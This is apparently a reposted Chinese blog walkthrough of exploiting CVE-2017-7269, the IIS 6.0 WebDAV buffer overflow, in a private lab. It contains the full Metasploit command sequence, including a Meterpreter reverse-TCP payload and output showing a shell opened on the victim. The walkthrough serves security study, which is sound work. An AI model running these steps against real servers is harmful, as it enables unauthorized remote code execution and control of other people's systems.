IIS6.0(CVE-2017-7269) 缓冲器溢出

IIS6.0(CVE-2017-7269) 缓冲器溢出,第1张

概述漏洞描述 开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。 漏洞编号 CVE-2017-7269 漏洞等级 高危 影响产品 Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0 漏洞环境搭建 我的环境是windows 2003 R2 Enter @H_403_1@

漏洞描述
开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。

漏洞编号
CVE-2017-7269

漏洞等级
高危

影响产品
Microsoft windows Server 2003 R2 开启WebDAV服务的IIS6.0

漏洞环境搭建
我的环境是windows 2003 R2 Enterprise Edition,安装好IIS 6.0 之后进入服务管理,在管理器中,有一个windows拓展,拓展中有一个webdav选项,该选项默认时禁止状态,右键选择允许就可以了。

随后windows+R–>services.msc–>打开webcclIEnt服务,完成配置


漏洞测试
攻击机:kali IP :192.168.48.131
受害机:windows2003 IP :192.168.48.146
下载exploit:https://github.com/Al1ex/CVE-2017-7269
将exp放到
/usr/share/Metasploitframework/modules/exploits/windows/IIS目录下

msf > search cve-2017-7269

Matching Modules
================

name disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/IIS/cve-2017-7269 2017-03-31 good CVE-2017-7269 Microsoft IIS WebDav ScStoragePathFromUrl Overflow
exploit/windows/IIS/IIS_webdav_scstoragepathfromurl 2017-03-26 manual Microsoft IIS WebDav ScStoragePathFromUrl Overflow


msf > use exploit/windows/IIS/cve-2017-7269
msf exploit(windows/IIS/cve-2017-7269) > show options

Module options (exploit/windows/IIS/cve-2017-7269):

name Current Setting required Description
---- --------------- -------- -----------
httpHost localhost yes http host for target
PhysicalPathLength 19 yes length of physical path for target(include backslash)
RHOST yes The target address
RPORT 80 yes The target port (TCP)


Exploit target:

ID name
-- ----
0 Microsoft windows Server 2003 R2


msf exploit(windows/IIS/cve-2017-7269) > set RHOST 192.168.48.146 //设置对方ip
RHOST => 192.168.48.146
msf exploit(windows/IIS/cve-2017-7269) > set httpHost 192.168.48.146 //设置对方网站
httpHost => 192.168.48.146
msf exploit(windows/IIS/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp //设置返回载荷
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/IIS/cve-2017-7269) > set LHOST 192.168.48.131 //设置本机IP
LHOST => 192.168.48.131
msf exploit(windows/IIS/cve-2017-7269) > exploit //溢出

[*] Started reverse TCP handler on 192.168.48.131:4444
[*] Sending stage (179779 bytes) to 192.168.48.146
[*] Meterpreter session 1 opened (192.168.48.131:4444 -> 192.168.48.146:1043) at 2018-01-24 22:49:23 +0800

meterpreter >

 

 

总结

以上是内存溢出为你收集整理的IIS6.0(CVE-2017-7269) 缓冲器溢出全部内容,希望文章能够帮你解决IIS6.0(CVE-2017-7269) 缓冲器溢出所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/web/1035684.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-24
下一篇 2022-05-24

发表评论

登录后才能评论

评论列表(0条)

保存